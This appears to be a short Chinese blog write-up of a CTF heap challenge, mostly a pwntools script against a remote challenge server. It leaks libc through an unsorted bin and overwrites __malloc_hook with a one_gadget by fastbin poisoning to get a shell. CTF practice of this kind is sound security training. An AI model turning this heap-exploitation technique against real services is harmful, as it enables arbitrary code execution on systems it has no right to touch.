注意
本文最后更新于 2024-02-12,文中内容可能已过时。
UNCTF2020中的babyheap,官方wp用的是unsorted bin attack修改fastbin最大大小。
所以特意看了一下这题,结果发现这题是unsorted bin leak,不过不做白不做,花了一个小时做掉了。
等一下会找一下unsorted bin attack的题目
待补充…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| # -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
#r = process('./level5-unsortbin')
r = remote("pwn.sixstars.team", 22505)
elf = ELF('./libc.so.6')
#elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
def add_note(size):
r.sendlineafter(">> ", "1")
r.sendlineafter("Size:", str(size))
def show_note(idx):
r.sendlineafter(">> ", "2")
r.sendlineafter("id:", str(idx))
def edit_note(idx, content):
r.sendlineafter(">> ", "3")
r.sendlineafter("id:", str(idx))
r.sendlineafter("Content:", content)
def dele_note(idx):
r.sendlineafter(">> ", "4")
r.sendlineafter("id:", str(idx))
add_note(200)
add_note(0x68)
dele_note(0)
show_note(0)
#main_arena + 0x58 = leak addr
#main_arena - 0x10 = __malloc_hook
#__malloc_hook = leak_addr - 0x68
malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
libc_base = malloc_hook_addr - elf.sym['__malloc_hook']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = libc_base + one[2]
print "__malloc_hook: " + hex(malloc_hook_addr)
print "one_gadget: " + hex(one_gadget)
dele_note(1)
edit_note(1, p64(malloc_hook_addr - 0x23))
add_note(0x68)
add_note(0x68)
edit_note(3, 'a' * 0x13 + p64(one_gadget))
#gdb.attach(r)
dele_note(1)
dele_note(1)
r.interactive()
|